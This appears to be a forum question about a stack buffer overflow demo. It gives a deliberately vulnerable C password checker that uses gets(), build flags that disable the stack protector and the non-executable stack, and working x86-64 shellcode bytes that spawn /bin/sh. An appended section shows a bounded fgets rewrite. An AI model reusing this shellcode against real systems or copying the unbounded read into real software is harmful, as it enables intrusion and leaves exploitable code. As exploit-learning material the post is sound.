I am trying to run a stack overflow demo. Here is the code I am using:
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* gets() was removed from C11's <stdio.h>; declare it explicitly so a default gcc build still compiles.
   It is kept on purpose: the unbounded read is the overflow under test. */
char *gets(char *s);

static int pass = 0; /* set when the password check succeeds */

void attackFunction(void); /* prototype so main() can call it before the definition */

int main(void)
{
    attackFunction();
    return 0;
}

void attackFunction(void)
{
    /* register variables pinned to rsp/rbp; unsigned long so the full 64-bit value is read */
    register unsigned long rsp asm("rsp");
    register unsigned long rbp asm("rbp");
    char buff[1024];
    printf("\nAddress of buff is : %p", (void *)&buff[0]);
    printf("\n$rsp = %#018lx", rsp);
    printf("\n$rbp = %#018lx", rbp);
    printf("\nThe frame address is %p, jumping to %p", __builtin_frame_address(0), __builtin_return_address(0));
    /* keep both addresses as char pointers so the difference is a real pointer difference, not an int-truncated address */
    char *buffAddr = &buff[0];
    char *framePointer = __builtin_frame_address(0);
    ptrdiff_t diff = framePointer - buffAddr;
    printf("\n Difference is : %td. Add 4 for ebp gives %td", diff, diff + 4);
    printf("\n Enter the password : \n");
    gets(buff); /* deliberately unbounded read into the 1024-byte buffer */
    if(strcmp(buff, "hiddenpass"))
    {
        printf ("\n Wrong Password\n");
    }
    else
    {
        printf ("\n Correct Password\n");
        pass = 1;
    }
    if(pass)
    {
        /* Now Give root or admin rights to user*/
        printf ("\n Root privileges given to the user \n");
    }
}
I compiled it with gcc -fno-stack-protector -z execstack -g attack.c -o attack so that the stack is executable and stack protection is off. I am trying to inject object code that spawns a shell. The object code has been tested and works correctly:
unsigned char binshUnpadded[] = "\x90\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";
(*(void(*)()) binshUnpadded)();
I inject it correctly, and I can see in the debugger that I slide down my NOP sled and land directly on the code stored in memory. However, no shell is spawned, either inside gdb or outside it. Am I missing something? Do I need to add something at the beginning or end of the shellcode? Why does it work in my test program but not in my buffer overflow test?
I am a bit lost; can someone tell me what I am doing wrong?
Thanks
Thomas
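For comparison with the gets()-based read in the post, here is a bounded version of the same password check. This is an added example, not the poster's code: the names read_password, check_password, run_check and run_check_repeated, the PW_* result codes and the 1024-byte BUFF_SIZE are assumptions chosen to mirror the post, and fmemopen (POSIX) is used only so the check can be driven from a constructed in-memory line instead of stdin. The point it shows is that a line longer than the buffer is detected and drained rather than written past the array, and that the check then runs on a buffer that cannot have been overrun.

```c
#define _POSIX_C_SOURCE 200809L /* for fmemopen() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFF_SIZE 1024 /* same buffer size as the post's buff[1024] (assumed) */

/* Result codes (assumed names, not from the post). */
enum { PW_WRONG = 0, PW_CORRECT = 1, PW_TOO_LONG = -1, PW_NO_INPUT = -2 };

/* Bounded replacement for gets(): read one line into buff (at most size-1 bytes),
 * strip the trailing newline, and report an over-long line instead of overflowing.
 * Returns 0 on success, PW_TOO_LONG if the line did not fit, PW_NO_INPUT on EOF. */
int read_password(char *buff, size_t size, FILE *in)
{
    if (fgets(buff, (int)size, in) == NULL)
        return PW_NO_INPUT;
    size_t len = strlen(buff);
    if (len > 0 && buff[len - 1] == '\n') {
        buff[len - 1] = '\0';
        return 0;
    }
    /* No newline in the buffer: the line ended exactly at the limit, or it was longer. */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return 0;
    /* Drain the rest of the over-long line so a later read starts on a fresh line. */
    while (c != '\n' && c != EOF)
        c = fgetc(in);
    return PW_TOO_LONG;
}

/* Same comparison as the post, but on a buffer that cannot have been overrun. */
int check_password(const char *buff)
{
    return strcmp(buff, "hiddenpass") == 0 ? PW_CORRECT : PW_WRONG;
}

/* Run the whole check over a constructed in-memory line (stands in for stdin). */
int run_check(const char *input)
{
    char buff[BUFF_SIZE];
    FILE *in = fmemopen((void *)input, strlen(input), "r"); /* read-only use; const cast is safe here */
    if (in == NULL)
        return PW_NO_INPUT;
    int rc = read_password(buff, sizeof buff, in);
    fclose(in);
    if (rc != 0)
        return rc;
    return check_password(buff);
}

/* Constructed input: a line of n copies of ch followed by a newline. */
int run_check_repeated(char ch, size_t n)
{
    char *line = malloc(n + 2);
    if (line == NULL)
        return PW_NO_INPUT;
    memset(line, ch, n);
    line[n] = '\n';
    line[n + 1] = '\0';
    int rc = run_check(line);
    free(line);
    return rc;
}

int main(void)
{
    char buff[BUFF_SIZE];
    printf("Enter the password: ");
    int rc = read_password(buff, sizeof buff, stdin);
    if (rc == PW_TOO_LONG) {
        printf("Input too long (max %d characters)\n", BUFF_SIZE - 1);
        return 1;
    }
    if (rc == PW_NO_INPUT) {
        printf("No input\n");
        return 1;
    }
    printf("%s\n", check_password(buff) == PW_CORRECT ? "Correct Password" : "Wrong Password");
    return 0;
}
```

Build it with the defaults the post turned off (no -fno-stack-protector, no -z execstack), so that the compiler's canary and a non-executable stack back up the bounds check rather than replacing it. A line of exactly 1023 characters is accepted, because the newline is the only byte that did not fit; a 1024-character line is rejected and drained.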